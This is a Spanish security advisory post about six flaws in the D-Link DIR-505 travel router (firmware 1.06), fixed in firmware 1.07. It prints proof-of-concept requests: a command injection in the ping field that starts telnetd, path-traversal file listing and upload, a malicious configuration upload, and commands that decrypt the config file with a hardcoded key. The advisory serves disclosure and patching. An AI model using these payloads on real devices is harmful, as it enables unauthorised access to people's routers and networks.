Icono del sitio Una Al Día

Múltiples vulnerabilidades en el router wireless D-Link DIR-505

Se han publicado seis vulnerabilidades que afectan al dispositivo D-Link DIR-505 Wireless Router. Los problemas podrían permitir la revelación de información sensible, inyección de comandos, acceder a los ficheros  del dispositivo, elevar privilegios y eludir restricciones de seguridad.
D-Link DIR-505 Wireless Router es un dispositivo portátil y de fácil manejo pensado para llevar de viaje y ampliar el alcance de cualquier red cableada mediante la creación de una red Wifi.
Alessandro Di Pinto ha descubierto múltiples errores de seguridad en los dispositivos D-Link DIR-500 que podrían ser aprovechados por un atacante en la misma red local. Son los siguientes:
      POST /my_cgi.cgi HTTP/1.1
      Host: <DIRECCION-IP>
      Cookie: uid=<COOKIE-VALIDA>
      Content-Length: 55
      request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;

       http://:8181/dws/api/ListFile?
       id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc

       POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1
       Host: <DIRECCION-IP>:8181
       Cookie: uid=<COOKIE-VALIDA>
       Content-Type: multipart/form-data;
               boundary=—————————736034324104825609817274318
       Content-Length: 1179
       —————————–736034324104825609817274318
       Content-Disposition: form-data; name=»id»
       admin
       —————————–736034324104825609817274318
       Content-Disposition: form-data; name=»tok»
       —————————–736034324104825609817274318
       Content-Disposition: form-data; name=»volid»
       1
       —————————–736034324104825609817274318
       Content-Disposition: form-data; name=»path»
       usb_dev/usb_A1/../../../../../../../../../tmp/
       —————————–736034324104825609817274318
       Content-Disposition: form-data; name=»filename»
       exploit.txt
       —————————–736034324104825609817274318
       Content-Disposition: form-data; name=»upload_file»; filename=»test.txt»
       Content-Type: text/plain
       malicious text
       —————————–736034324104825609817274318

       POST /my_cgi.cgi HTTP/1.1
       Host: <DIRECCION-IP>
       Cookie: uid=<COOKIE-VALIDA>
       Content-Type: multipart/form-data;
               boundary=—————————4318828241986447042487864450
       Content-Length: 382
       —————————–4318828241986447042487864450
       Content-Disposition: form-data; name=»which_action»
       load_conf
       —————————–4318828241986447042487864450
       Content-Disposition: form-data; name=»file»;
       filename=»attacker-config.bin»
       Content-Type: text/plain
       <NUEVA-CONFIGURACIOM-PARA-EL-DISPOSITIVO>
       —————————–4318828241986447042487864450
      # Eliminar los 84 bytes de cabecera
      dd if=config-file of=config-file-no-header bs=84 skip=1
      # Desencriptar el contenido
      ccrypt -d -K sw5-superman config-file-no-header
Las vulnerabilidades afectan al dispositivo D-Link DIR-505 Wireless Router con firmware 1.06, aunque otras versiones anteriores y otros dispositivos también podrían estar comprometidos.
D-Link ha publicado una actualización de firmware (1.07) en su página web y FTP oficial, que corrige los errores anteriormente expuestos.
Más información:
Multiple vulnerabilities on D-Link Dir-505 devices
Juan José Ruiz

Acerca de Juan José Ruiz

Juan José Ruiz Ha escrito 229 publicaciones.

Salir de la versión móvil